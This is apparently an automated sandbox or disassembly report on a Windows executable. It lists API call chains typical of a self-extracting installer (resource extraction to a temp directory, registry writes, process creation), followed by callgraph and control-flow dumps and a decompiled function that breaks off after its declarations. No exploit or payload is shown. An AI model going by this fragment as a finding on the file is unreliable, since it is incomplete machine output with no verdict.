2710->2713 2714 3e3ada 2710->2714 2711->2279 2711->2286 2716 3e3aad LocalFree 2712->2716 2713->2711 2715 3e6517 24 API calls 2714->2715 2717 3e3aec LocalFree 2715->2717 2716->2711 2717->2711 2719 3e628f 2718->2719 2719->2286 2721 3e468f 7 API calls 2720->2721 2722 3e417d LocalAlloc 2721->2722 2723 3e41a8 2722->2723 2724 3e4195 2722->2724 2725 3e468f 7 API calls 2723->2725 2726 3e44b9 20 API calls 2724->2726 2727 3e41b5 2725->2727 2728 3e41a6 2726->2728 2729 3e41c5 lstrcmpA 2727->2729 2731 3e41b9 2727->2731 2728->2286 2730 3e41e6 LocalFree 2729->2730 2729->2731 2730->2728 2732 3e44b9 20 API calls 2731->2732 2732->2730 2734 3e171e _vsnprintf 2733->2734 2735 3e62c9 FindResourceA 2734->2735 2737 3e62cb LoadResource LockResource 2735->2737 2738 3e6353 2735->2738 2737->2738 2741 3e62e0 2737->2741 2739 3e6ce0 4 API calls 2738->2739 2740 3e51ca 2739->2740 2740->2582 2740->2583 2742 3e631b FreeResource 2741->2742 2743 3e6355 FreeResource 2741->2743 2744 3e171e _vsnprintf 2742->2744 2743->2738 2744->2735 2746 3e551a 2745->2746 2747 3e548a 2745->2747 2816 3e58c8 2746->2816 2805 3e53a1 2747->2805 2751 3e5495 2755 3e550c 2751->2755 2756 3e54c2 GetSystemInfo 2751->2756 2760 3e5581 2751->2760 2752 3e6ce0 4 API calls 2757 3e559a 2752->2757 2753 3e554d 2753->2760 2761 3e597d 34 API calls 2753->2761 2754 3e553b CreateDirectoryA 2758 3e5577 2754->2758 2759 3e5547 2754->2759 2762 3e658a CharPrevA 2755->2762 2764 3e54da 2756->2764 2757->2607 2769 3e2630 GetWindowsDirectoryA 2757->2769 2763 3e6285 GetLastError 2758->2763 2759->2753 2760->2752 2765 3e555c 2761->2765 2762->2746 2766 3e557c 2763->2766 2764->2755 2767 3e658a CharPrevA 2764->2767 2765->2760 2768 3e5568 RemoveDirectoryA 2765->2768 2766->2760 2767->2755 2768->2760 2770 3e265e 2769->2770 2771 3e266f 2769->2771 2772 3e44b9 20 API calls 2770->2772 2773 3e6ce0 4 API calls 2771->2773 2772->2771 2774 3e2687 2773->2774 2774->2612 2774->2621 2776 3e696e GetDiskFreeSpaceA 2775->2776 2777 3e69a1 2775->2777 2776->2777 2778 3e6989 MulDiv 2776->2778 2777->2630 2778->2777 2780 3e59dd GetDiskFreeSpaceA 2779->2780 2781 3e59bb 2779->2781 2782 3e5ba1 memset 2780->2782 2783 3e5a21 MulDiv 2780->2783 2784 3e44b9 20 API calls 2781->2784 2785 3e6285 GetLastError 2782->2785 2783->2782 2786 3e5a50 GetVolumeInformationA 2783->2786 2787 3e59cc 2784->2787 2788 3e5bbc GetLastError FormatMessageA 2785->2788 2789 3e5a6e memset 2786->2789 2790 3e5ab5 SetCurrentDirectoryA 2786->2790 2791 3e6285 GetLastError 2787->2791 2792 3e5be3 2788->2792 2793 3e6285 GetLastError 2789->2793 2794 3e5acc 2790->2794 2800 3e59d1 2791->2800 2795 3e44b9 20 API calls 2792->2795 2796 3e5a89 GetLastError FormatMessageA 2793->2796 2801 3e5b0a 2794->2801 2803 3e5b20 2794->2803 2797 3e5bf5 SetCurrentDirectoryA 2795->2797 2796->2792 2797->2800 2798 3e6ce0 4 API calls 2799 3e5c11 2798->2799 2799->2612 2800->2798 2802 3e44b9 20 API calls 2801->2802 2802->2800 2803->2800 2828 3e268b 2803->2828 2807 3e53bf 2805->2807 2806 3e171e _vsnprintf 2806->2807 2807->2806 2808 3e658a CharPrevA 2807->2808 2811 3e5415 GetTempFileNameA 2807->2811 2809 3e53fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 3e544f CreateDirectoryA 2809->2810 2810->2811 2812 3e543a 2810->2812 2811->2812 2813 3e5429 DeleteFileA CreateDirectoryA 2811->2813 2814 3e6ce0 4 API calls 2812->2814 2813->2812 2815 3e5449 2814->2815 2815->2751 2817 3e58d8 2816->2817 2817->2817 2818 3e58df LocalAlloc 2817->2818 2819 3e58f3 2818->2819 2821 3e5919 2818->2821 2820 3e44b9 20 API calls 2819->2820 2827 3e5906 2820->2827 2823 3e658a CharPrevA 2821->2823 2822 3e6285 GetLastError 2824 3e5534 2822->2824 2825 3e5931 CreateFileA LocalFree 2823->2825 2824->2753 2824->2754 2826 3e595b CloseHandle GetFileAttributesA 2825->2826 2825->2827 2826->2827 2827->2822 2827->2824 2829 3e26b9 2828->2829 2830 3e26e5 2828->2830 2831 3e171e _vsnprintf 2829->2831 2832 3e271f 2830->2832 2833 3e26ea 2830->2833 2835 3e26cc 2831->2835 2837 3e171e _vsnprintf 2832->2837 2843 3e26e3 2832->2843 2834 3e171e _vsnprintf 2833->2834 2836 3e26fd 2834->2836 2839 3e44b9 20 API calls 2835->2839 2840 3e44b9 20 API calls 2836->2840 2841 3e2735 2837->2841 2838 3e6ce0 4 API calls 2842 3e276d 2838->2842 2839->2843 2840->2843 2844 3e44b9 20 API calls 2841->2844 2842->2800 2843->2838 2844->2843 2846 3e468f 7 API calls 2845->2846 2847 3e4ff5 FindResourceA LoadResource LockResource 2846->2847 2848 3e5020 2847->2848 2849 3e515f 2847->2849 2850 3e5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2851 3e5057 2848->2851 2849->2648 2850->2851 2864 3e4efd 2851->2864 2854 3e507c 2859 3e44b9 20 API calls 2854->2859 2861 3e5075 2854->2861 2855 3e5060 2856 3e44b9 20 API calls 2855->2856 2856->2861 2857 3e511d 2860 3e513a 2857->2860 2862 3e44b9 20 API calls 2857->2862 2858 3e5110 FreeResource 2858->2857 2859->2861 2860->2849 2863 3e514c SendMessageA 2860->2863 2861->2857 2861->2858 2862->2860 2863->2849 2865 3e4f4a 2864->2865 2871 3e4fa1 2865->2871 2872 3e4980 2865->2872 2867 3e6ce0 4 API calls 2868 3e4fc6 2867->2868 2868->2854 2868->2855 2871->2867 2873 3e4990 2872->2873 2874 3e49a5 2873->2874 2875 3e49c2 lstrcmpA 2873->2875 2878 3e44b9 20 API calls 2874->2878 2876 3e4a0e 2875->2876 2877 3e49ba 2875->2877 2876->2877 2883 3e487a 2876->2883 2877->2871 2880 3e4b60 2877->2880 2878->2877 2881 3e4b76 2880->2881 2882 3e4b92 FindCloseChangeNotification 2880->2882 2881->2871 2882->2881 2884 3e48a2 CreateFileA 2883->2884 2886 3e4908 2884->2886 2887 3e48e9 2884->2887 2886->2877 2887->2886 2888 3e48ee 2887->2888 2891 3e490c 2888->2891 2892 3e48f5 CreateFileA 2891->2892 2893 3e4917 2891->2893 2892->2886 2893->2892 2894 3e4962 CharNextA 2893->2894 2895 3e4953 CreateDirectoryA 2893->2895 2894->2893 2895->2894 2897 3e255b 2896->2897 2898 3e2510 2896->2898 2900 3e6ce0 4 API calls 2897->2900 2899 3e658a CharPrevA 2898->2899 2902 3e2522 WritePrivateProfileStringA _lopen 2899->2902 2901 3e2569 2900->2901 2901->2658 2902->2897 2903 3e2548 _llseek _lclose 2902->2903 2903->2897 2905 3e1b25 2904->2905 3009 3e1a84 2905->3009 2907 3e1b57 2908 3e658a CharPrevA 2907->2908 2909 3e1b8c 2907->2909 2908->2909 2910 3e66c8 2 API calls 2909->2910 2911 3e1bd1 2910->2911 2912 3e1bd9 CompareStringA 2911->2912 2913 3e1d73 2911->2913 2912->2913 2915 3e1bf7 GetFileAttributesA 2912->2915 2914 3e66c8 2 API calls 2913->2914 2918 3e1d7d 2914->2918 2916 3e1c0d 2915->2916 2917 3e1d53 2915->2917 2916->2917 2922 3e1a84 2 API calls 2916->2922 2921 3e1d64 2917->2921 2919 3e1df8 LocalAlloc 2918->2919 2920 3e1d81 CompareStringA 2918->2920 2919->2921 2923 3e1e0b GetFileAttributesA 2919->2923 2920->2919 2928 3e1d9b 2920->2928 2924 3e44b9 20 API calls 2921->2924 2925 3e1c31 2922->2925 2931 3e1e1d 2923->2931 2943 3e1e45 2923->2943 2926 3e1d6c 2924->2926 2927 3e1c50 LocalAlloc 2925->2927 2932 3e1a84 2 API calls 2925->2932 2930 3e6ce0 4 API calls 2926->2930 2927->2921 2929 3e1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2927->2929 2928->2928 2933 3e1dbe LocalAlloc 2928->2933 2938 3e1cf8 2929->2938 2942 3e1cc2 2929->2942 2936 3e1ea1 2930->2936 2931->2943 2932->2927 2933->2921 2937 3e1de1 2933->2937 2936->2670 2941 3e171e _vsnprintf 2937->2941 2939 3e1d09 GetShortPathNameA 2938->2939 2940 3e1d23 2938->2940 2939->2940 2944 3e171e _vsnprintf 2940->2944 2941->2942 2942->2926 3015 3e2aac 2943->3015 2944->2942 2946 3e209a 2945->2946 2947 3e2256 2945->2947 2949 3e171e _vsnprintf 2946->2949 2952 3e20dc 2946->2952 2948 3e6ce0 4 API calls 2947->2948 2950 3e2263 2948->2950 2951 3e20af RegQueryValueExA 2949->2951 2950->2670 2951->2946 2951->2952 2953 3e20fb GetSystemDirectoryA 2952->2953 2954 3e20e4 RegCloseKey 2952->2954 2955 3e658a CharPrevA 2953->2955 2954->2947 2956 3e211b LoadLibraryA 2955->2956 2957 3e212e GetProcAddress FreeLibrary 2956->2957 2958 3e2179 GetModuleFileNameA 2956->2958 2957->2958 2960 3e214e GetSystemDirectoryA 2957->2960 2959 3e21de RegCloseKey 2958->2959 2963 3e2177 2958->2963 2959->2947 2961 3e2165 2960->2961 2960->2963 2962 3e658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 3e21b7 LocalAlloc 2963->2964 2965 3e21ec 2964->2965 2966 3e21cd 2964->2966 2968 3e171e _vsnprintf 2965->2968 2967 3e44b9 20 API calls 2966->2967 2967->2959 2969 3e2218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2947 2972 3e4016 CreateProcessA 2971->2972 2983 3e4106 2971->2983 2974 3e40c4 2972->2974 2975 3e4041 WaitForSingleObject GetExitCodeProcess 2972->2975 2973 3e6ce0 4 API calls 2977 3e4117 2973->2977 2978 3e6285 GetLastError 2974->2978 2976 3e4070 2975->2976 3042 3e411b 2976->3042 2977->2670 2980 3e40c9 GetLastError FormatMessageA 2978->2980 2982 3e44b9 20 API calls 2980->2982 2981 3e4096 CloseHandle CloseHandle 2981->2983 2984 3e40ba 2981->2984 2982->2983 2983->2973 2984->2983 2986 3e64c2 2985->2986 2987 3e658a CharPrevA 2986->2987 2988 3e64d8 GetFileAttributesA 2987->2988 2989 3e64ea 2988->2989 2990 3e6501 LoadLibraryA 2988->2990 2989->2990 2991 3e64ee LoadLibraryExA 2989->2991 2992 3e6508 2990->2992 2991->2992 2993 3e6ce0 4 API calls 2992->2993 2994 3e6513 2993->2994 2994->2696 2996 3e2289 RegOpenKeyExA 2995->2996 2997 3e2381 2995->2997 2996->2997 2999 3e22b1 RegQueryValueExA 2996->2999 2998 3e6ce0 4 API calls 2997->2998 3000 3e238c 2998->3000 3001 3e22e6 memset GetSystemDirectoryA 2999->3001 3002 3e2374 RegCloseKey 2999->3002 3000->2674 3003 3e230f 3001->3003 3004 3e2321 3001->3004 3002->2997 3005 3e658a CharPrevA 3003->3005 3006 3e171e _vsnprintf 3004->3006 3005->3004 3007 3e233f RegSetValueExA 3006->3007 3007->3002 3010 3e1a9a 3009->3010 3012 3e1aba 3010->3012 3014 3e1aaf 3010->3014 3028 3e667f 3010->3028 3012->2907 3013 3e667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 3e2be6 3015->3016 3017 3e2ad4 GetModuleFileNameA 3015->3017 3018 3e6ce0 4 API calls 3016->3018 3025 3e2b02 3017->3025 3020 3e2bf5 3018->3020 3019 3e2af1 IsDBCSLeadByte 3019->3025 3020->2926 3021 3e2bca CharNextA 3024 3e2bd3 CharNextA 3021->3024 3022 3e2b11 CharNextA CharUpperA 3023 3e2b8d CharUpperA 3022->3023 3022->3025 3023->3025 3024->3025 3025->3016 3025->3019 3025->3021 3025->3022 3025->3024 3027 3e2b43 CharPrevA 3025->3027 3033 3e65e8 3025->3033 3027->3025 3030 3e6689 3028->3030 3029 3e6648 IsDBCSLeadByte 3029->3030 3030->3029 3031 3e66a5 3030->3031 3032 3e6697 CharNextA 3030->3032 3031->3010 3032->3030 3034 3e65f4 3033->3034 3034->3034 3035 3e65fb CharPrevA 3034->3035 3036 3e6611 CharPrevA 3035->3036 3037 3e661e 3036->3037 3038 3e660b 3036->3038 3039 3e663d 3037->3039 3040 3e6627 CharPrevA 3037->3040 3041 3e6634 CharNextA 3037->3041 3038->3036 3038->3037 3039->3025 3040->3039 3040->3041 3041->3039 3043 3e4132 3042->3043 3045 3e412a 3042->3045 3046 3e1ea7 3043->3046 3045->2981 3047 3e1eba 3046->3047 3048 3e1ed3 3046->3048 3049 3e256d 15 API calls 3047->3049 3048->3045 3049->3048 3051 3e2026 3050->3051 3052 3e1ff0 RegOpenKeyExA 3050->3052 3051->2319 3052->3051 3053 3e200f RegDeleteValueA RegCloseKey 3052->3053 3053->3051 3164 3e6a20 __getmainargs 3165 3e19e0 3166 3e1a24 GetDesktopWindow 3165->3166 3167 3e1a03 3165->3167 3168 3e43d0 11 API calls 3166->3168 3169 3e1a16 EndDialog 3167->3169 3170 3e1a20 3167->3170 3171 3e1a33 LoadStringA SetDlgItemTextA MessageBeep 3168->3171 3169->3170 3172 3e6ce0 4 API calls 3170->3172 3171->3170 3173 3e1a7e 3172->3173 3054 3e4ad0 3062 3e3680 3054->3062 3057 3e4aee WriteFile 3059 3e4b0f 3057->3059 3060 3e4b14 3057->3060 3058 3e4ae9 3060->3059 3061 3e4b3b SendDlgItemMessageA 3060->3061 3061->3059 3063 3e3691 MsgWaitForMultipleObjects 3062->3063 3064 3e36e8 3063->3064 3065 3e36a9 PeekMessageA 3063->3065 3064->3057 3064->3058 3065->3063 3066 3e36bc 3065->3066 3066->3063 3066->3064 3067 3e36c7 DispatchMessageA 3066->3067 3068 3e36d1 PeekMessageA 3066->3068 3067->3068 3068->3066 3069 3e4cd0 3070 3e4d0b 3069->3070 3071 3e4cf4 3069->3071 3072 3e4d02 3070->3072 3075 3e4dcb 3070->3075 3078 3e4d25 3070->3078 3071->3072 3073 3e4b60 FindCloseChangeNotification 3071->3073 3074 3e6ce0 4 API calls 3072->3074 3073->3072 3076 3e4e95 3074->3076 3077 3e4dd4 SetDlgItemTextA 3075->3077 3079 3e4de3 3075->3079 3077->3079 3078->3072 3092 3e4c37 3078->3092 3079->3072 3097 3e476d 3079->3097 3083 3e4e38 3083->3072 3085 3e4980 25 API calls 3083->3085 3084 3e4b60 FindCloseChangeNotification 3086 3e4d99 SetFileAttributesA 3084->3086 3087 3e4e56 3085->3087 3086->3072 3087->3072 3088 3e4e64 3087->3088 3106 3e47e0 LocalAlloc 3088->3106 3091 3e4e6f 3091->3072 3093 3e4c4c DosDateTimeToFileTime 3092->3093 3094 3e4c88 3092->3094 3093->3094 3095 3e4c5e LocalFileTimeToFileTime 3093->3095 3094->3072 3094->3084 3095->3094 3096 3e4c70 SetFileTime 3095->3096 3096->3094 3115 3e66ae GetFileAttributesA 3097->3115 3099 3e477b 3099->3083 3100 3e47cc SetFileAttributesA 3102 3e47db 3100->3102 3102->3083 3103 3e6517 24 API calls 3104 3e47b1 3103->3104 3104->3100 3104->3102 3105 3e47c2 3104->3105 3105->3100 3107 3e480f LocalAlloc 3106->3107 3108 3e47f6 3106->3108 3111 3e4831 3107->3111 3114 3e480b 3107->3114 3109 3e44b9 20 API calls 3108->3109 3109->3114 3112 3e44b9 20 API calls 3111->3112 3113 3e4846 LocalFree 3112->3113 3113->3114 3114->3091 3116 3e4777 3115->3116 3116->3099 3116->3100 3116->3103 3174 3e3210 3175 3e3227 3174->3175 3198 3e328e EndDialog 3174->3198 3176 3e3235 3175->3176 3177 3e33e2 GetDesktopWindow 3175->3177 3181 3e324c 3176->3181 3182 3e32dd GetDlgItemTextA 3176->3182 3189 3e3239 3176->3189 3179 3e43d0 11 API calls 3177->3179 3180 3e33f1 SetWindowTextA SendDlgItemMessageA 3179->3180 3183 3e341f GetDlgItem EnableWindow 3180->3183 3180->3189 3184 3e32c5 EndDialog 3181->3184 3185 3e3251 3181->3185 3190 3e32fc 3182->3190 3206 3e3366 3182->3206 3183->3189 3184->3189 3186 3e325c LoadStringA 3185->3186 3185->3189 3188 3e3294 3186->3188 3199 3e327b 3186->3199 3187 3e44b9 20 API calls 3187->3189 3212 3e4224 LoadLibraryA 3188->3212 3193 3e3331 GetFileAttributesA 3190->3193 3190->3206 3196 3e333f 3193->3196 3197 3e337c 3193->3197 3194 3e44b9 20 API calls 3194->3198 3195 3e32a5 SetDlgItemTextA 3195->3189 3195->3199 3201 3e44b9 20 API calls 3196->3201 3200 3e658a CharPrevA 3197->3200 3198->3189 3199->3194 3202 3e338d 3200->3202 3203 3e3351 3201->3203 3204 3e58c8 27 API calls 3202->3204 3203->3189 3205 3e335a CreateDirectoryA 3203->3205 3207 3e3394 3204->3207 3205->3197 3205->3206 3206->3187 3207->3206 3208 3e33a4 3207->3208 3209 3e33c7 EndDialog 3208->3209 3210 3e597d 34 API calls 3208->3210 3209->3189 3211 3e33c3 3210->3211 3211->3189 3211->3209 3213 3e4246 GetProcAddress 3212->3213 3214 3e43b2 3212->3214 3215 3e425d GetProcAddress 3213->3215 3216 3e43a4 FreeLibrary 3213->3216 3218 3e44b9 20 API calls 3214->3218 3215->3216 3217 3e4274 GetProcAddress 3215->3217 3216->3214 3217->3216 3219 3e428b 3217->3219 3220 3e329d 3218->3220 3221 3e4295 GetTempPathA 3219->3221 3225 3e42e1 3219->3225 3220->3189 3220->3195 3222 3e42ad 3221->3222 3222->3222 3223 3e42b4 CharPrevA 3222->3223 3224 3e42d0 CharPrevA 3223->3224 3223->3225 3224->3225 3226 3e4390 FreeLibrary 3225->3226 3226->3220 3227 3e4a50 3228 3e4a9f ReadFile 3227->3228 3229 3e4a66 3227->3229 3230 3e4abb 3228->3230 3229->3230 3231 3e4a82 memcpy 3229->3231 3231->3230 3232 3e3450 3233 3e345e 3232->3233 3234 3e34d3 EndDialog 3232->3234 3235 3e349a GetDesktopWindow 3233->3235 3238 3e3465 3233->3238 3237 3e346a 3234->3237 3236 3e43d0 11 API calls 3235->3236 3239 3e34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3236->3239 3238->3237 3240 3e348c EndDialog 3238->3240 3239->3237 3240->3237 3241 3e6c03 3242 3e6c1e 3241->3242 3243 3e6c17 _exit 3241->3243 3244 3e6c27 _cexit 3242->3244 3245 3e6c32 3242->3245 3243->3242 3244->3245 3117 3e6f40 SetUnhandledExceptionFilter 3118 3e4cc0 GlobalFree 3246 3e4200 3247 3e421e 3246->3247 3248 3e420b SendMessageA 3246->3248 3248->3247 3249 3e3100 3250 3e31b0 3249->3250 3251 3e3111 3249->3251 3253 3e31b9 SendDlgItemMessageA 3250->3253 3254 3e3141 3250->3254 3252 3e311d 3251->3252 3255 3e3149 GetDesktopWindow 3251->3255 3252->3254 3256 3e3138 EndDialog 3252->3256 3253->3254 3257 3e43d0 11 API calls 3255->3257 3256->3254 3258 3e315d 6 API calls 3257->3258 3258->3254 3259 3e4bc0 3260 3e4bd7 3259->3260 3262 3e4c05 3259->3262 3261 3e4c1b SetFilePointer 3261->3260 3262->3260 3262->3261 3263 3e30c0 3264 3e30de CallWindowProcA 3263->3264 3265 3e30ce 3263->3265 3266 3e30da 3264->3266 3265->3264 3265->3266 3267 3e63c0 3268 3e6407 3267->3268 3269 3e658a CharPrevA 3268->3269 3270 3e6415 CreateFileA 3269->3270 3271 3e643a 3270->3271 3272 3e6448 WriteFile 3270->3272 3275 3e6ce0 4 API calls 3271->3275 3273 3e6465 CloseHandle 3272->3273 3273->3271 3276 3e648f 3275->3276

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_003E3A3F 16 Function_003E6517 0->16 51 Function_003E44B9 0->51 74 Function_003E468F 0->74 79 Function_003E6285 0->79 1 Function_003E6C3F 2 Function_003E4C37 3 Function_003E2630 3->51 104 Function_003E6CE0 3->104 4 Function_003E6E2A 89 Function_003E6CF0 4->89 5 Function_003E202A 10 Function_003E171E 5->10 5->51 75 Function_003E658A 5->75 5->104 6 Function_003E3B26 6->16 68 Function_003E6298 6->68 102 Function_003E4FE0 6->102 7 Function_003E4224 7->51 81 Function_003E1680 7->81 8 Function_003E7120 9 Function_003E6A20 11 Function_003E621E 27 Function_003E597D 11->27 11->51 11->79 11->104 12 Function_003E681F 88 Function_003E66F9 12->88 12->104 13 Function_003E2F1D 13->0 13->6 13->11 32 Function_003E256D 13->32 34 Function_003E4169 13->34 37 Function_003E5164 13->37 13->51 60 Function_003E3BA2 13->60 63 Function_003E55A0 13->63 13->75 13->79 101 Function_003E51E5 13->101 13->104 14 Function_003E411B 58 Function_003E1EA7 14->58 15 Function_003E5C17 16->51 17 Function_003E3210 17->7 17->27 17->51 17->75 111 Function_003E43D0 17->111 112 Function_003E58C8 17->112 18 Function_003E7010 19 Function_003E490C 20 Function_003E7208 21 Function_003E4702 53 Function_003E16B3 21->53 21->81 22 Function_003E6C03 47 Function_003E724D 22->47 23 Function_003E7000 24 Function_003E4200 25 Function_003E3100 25->111 26 Function_003E667F 48 Function_003E6648 26->48 27->51 76 Function_003E268B 27->76 27->79 27->104 28 Function_003E487A 28->19 29 Function_003E2773 29->75 29->81 84 Function_003E1781 29->84 29->104 30 Function_003E7270 31 Function_003E6C70 105 Function_003E24E0 32->105 33 Function_003E476D 33->16 55 Function_003E66AE 33->55 34->51 34->74 35 Function_003E5467 35->27 65 Function_003E53A1 35->65 35->75 35->79 35->81 35->84 35->104 35->112 36 Function_003E2267 36->10 36->75 36->104 37->51 37->68 37->74 38 Function_003E6A60 38->1 38->20 40 Function_003E7060 38->40 43 Function_003E7155 38->43 38->47 87 Function_003E2BFB 38->87 39 Function_003E4B60 40->8 40->18 41 Function_003E6760 42 Function_003E6F54 42->20 42->47 44 Function_003E6952 45 Function_003E4A50 46 Function_003E3450 46->111 49 Function_003E6F40 50 Function_003E6FBE 50->42 51->10 51->12 51->81 51->104 115 Function_003E67C9 51->115 52 Function_003E52B6 72 Function_003E2390 52->72 52->84 100 Function_003E65E8 52->100 52->104 108 Function_003E1FE1 52->108 53->84 54 Function_003E69B0 54->23 54->31 54->50 95 Function_003E71EF 54->95 56 Function_003E2AAC 56->81 56->100 56->104 114 Function_003E17C8 56->114 57 Function_003E2CAA 57->16 57->51 62 Function_003E18A3 57->62 67 Function_003E5C9E 57->67 57->72 57->74 92 Function_003E36EE 57->92 57->104 58->32 59 Function_003E6FA5 59->47 60->5 60->36 60->51 70 Function_003E6495 60->70 60->74 60->79 60->84 94 Function_003E3FEF 60->94 98 Function_003E1AE8 60->98 60->104 61 Function_003E72A2 93 Function_003E17EE 62->93 62->104 63->3 63->16 63->27 63->35 63->44 63->51 63->74 63->75 63->79 63->84 63->104 64 Function_003E4CA0 65->10 65->75 65->81 65->104 66 Function_003E6FA1 67->4 67->15 67->26 67->51 67->75 67->81 103 Function_003E31E0 67->103 67->104 113 Function_003E66C8 67->113 68->10 68->104 69 Function_003E4E99 69->81 70->75 70->84 70->104 71 Function_003E6793 72->53 72->72 72->75 72->81 72->104 73 Function_003E1F90 73->51 73->58 73->104 75->53 76->10 76->51 76->104 77 Function_003E2A89 78 Function_003E1A84 78->26 80 Function_003E4980 80->28 80->51 81->84 82 Function_003E3680 83 Function_003E6380 85 Function_003E70FE 86 Function_003E4EFD 86->39 86->80 86->104 87->13 87->52 87->57 87->73 90 Function_003E34F0 90->51 90->82 90->111 91 Function_003E6EF0 92->12 92->51 92->77 99 Function_003E28E8 92->99 92->104 92->115 93->104 94->14 94->51 94->79 94->104 96 Function_003E6BEF 97 Function_003E70EB 98->10 98->51 98->53 98->56 98->75 98->78 98->81 98->84 98->104 98->113 99->29 99->77 101->51 101->74 101->79 102->51 102->74 102->86 104->89 105->75 105->104 106 Function_003E19E0 106->104 106->111 107 Function_003E47E0 107->51 107->81 109 Function_003E4AD0 109->82 110 Function_003E4CD0 110->2 110->21 110->33 110->39 110->69 110->80 110->104 110->107 111->104 112->51 112->75 112->79 112->81 113->48 115->71 116 Function_003E4CC0 117 Function_003E4BC0 118 Function_003E30C0 119 Function_003E63C0 119->75 119->84 119->104

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 36 3e3ba2-3e3bd9 37 3e3bfd-3e3bff 36->37 38 3e3bdb-3e3bee call 3e468f 36->38 40 3e3c03-3e3c28 memset 37->40 44 3e3bf4-3e3bf7 38->44 45 3e3d13-3e3d30 call 3e44b9 38->45 42 3e3c2e-3e3c40 call 3e468f 40->42 43 3e3d35-3e3d48 call 3e1781 40->43 42->45 51 3e3c46-3e3c49 42->51 49 3e3d4d-3e3d52 43->49 44->37 44->45 57 3e3f4d 45->57 53 3e3d9e-3e3db6 call 3e1ae8 49->53 54 3e3d54-3e3d6c call 3e468f 49->54 51->45 55 3e3c4f-3e3c56 51->55 53->57 68 3e3dbc-3e3dc2 53->68 54->45 64 3e3d6e-3e3d75 54->64 59 3e3c58-3e3c5e 55->59 60 3e3c60-3e3c65 55->60 62 3e3f4f-3e3f63 call 3e6ce0 57->62 65 3e3c6e-3e3c73 59->65 66 3e3c67-3e3c6d 60->66 67 3e3c75-3e3c7c 60->67 70 3e3fda-3e3fe1 64->70 71 3e3d7b-3e3d98 CompareStringA 64->71 72 3e3c87-3e3c89 65->72 66->65 67->72 75 3e3c7e-3e3c82 67->75 73 3e3de6-3e3de8 68->73 74 3e3dc4-3e3dce 68->74 81 3e3fe8-3e3fea 70->81 82 3e3fe3 call 3e2267 70->82 71->53 71->70 72->49 78 3e3c8f-3e3c98 72->78 79 3e3dee-3e3df5 73->79 80 3e3f0b-3e3f15 call 3e3fef 73->80 74->73 77 3e3dd0-3e3dd7 74->77 75->72 77->73 84 3e3dd9-3e3ddb 77->84 85 3e3c9a-3e3c9c 78->85 86 3e3cf1-3e3cf3 78->86 87 3e3fab-3e3fd2 call 3e44b9 LocalFree 79->87 88 3e3dfb-3e3dfd 79->88 91 3e3f1a-3e3f1c 80->91 81->62 82->81 84->79 92 3e3ddd-3e3de1 call 3e202a 84->92 94 3e3c9e-3e3ca3 85->94 95 3e3ca5-3e3ca7 85->95 86->53 90 3e3cf9-3e3d11 call 3e468f 86->90 87->57 88->80 96 3e3e03-3e3e0a 88->96 90->45 90->49 98 3e3f1e-3e3f2d LocalFree 91->98 99 3e3f46-3e3f47 LocalFree 91->99 92->73 102 3e3cb2-3e3cc5 call 3e468f 94->102 95->57 103 3e3cad 95->103 96->80 104 3e3e10-3e3e19 call 3e6495 96->104 107 3e3fd7-3e3fd9 98->107 108 3e3f33-3e3f3b 98->108 99->57 102->45 112 3e3cc7-3e3ce8 CompareStringA 102->112 103->102 113 3e3e1f-3e3e36 GetProcAddress 104->113 114 3e3f92-3e3fa9 call 3e44b9 104->114 107->70 108->40 112->86 115 3e3cea-3e3ced 112->115 116 3e3e3c-3e3e80 113->116 117 3e3f64-3e3f76 call 3e44b9 FreeLibrary 113->117 126 3e3f7c-3e3f90 LocalFree call 3e6285 114->126 115->86 120 3e3e8b-3e3e94 116->120 121 3e3e82-3e3e87 116->121 117->126 124 3e3e9f-3e3ea2 120->124 125 3e3e96-3e3e9b 120->125 121->120 128 3e3ead-3e3eb6 124->128 129 3e3ea4-3e3ea9 124->129 125->124 126->57 131 3e3eb8-3e3ebd 128->131 132 3e3ec1-3e3ec3 128->132 129->128 131->132 133 3e3ece-3e3eec 132->133 134 3e3ec5-3e3eca 132->134 137 3e3eee-3e3ef3 133->137 138 3e3ef5-3e3efd 133->138 134->133 137->138 139 3e3eff-3e3f09 FreeLibrary 138->139 140 3e3f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E003E3BA2() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				short _v300;
                                                                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                                                                      				void _v348;
                                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                                      				intOrPtr _v356;
                                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                                      				short _v364;
                                                                                                                                                                                                      				char* _v368;
                                                                                                                                                                                                      				intOrPtr _v372;
                                                                                                                                                                                                      				void* _v376;
                                                                                                                                                                                                      				intOrPtr _v380;
                                                                                                                                                                                                      				char _v384;
                                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                                      				intOrPtr _v392;
                                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                                      				void* _v408;
                                                                                                                                                                                                      				void* _v424;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      				void* _t77;
                                                                                                                                                                                                      				signed int _t79;
                                                                                                                                                                                                      				short _t96;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				signed int _t104;
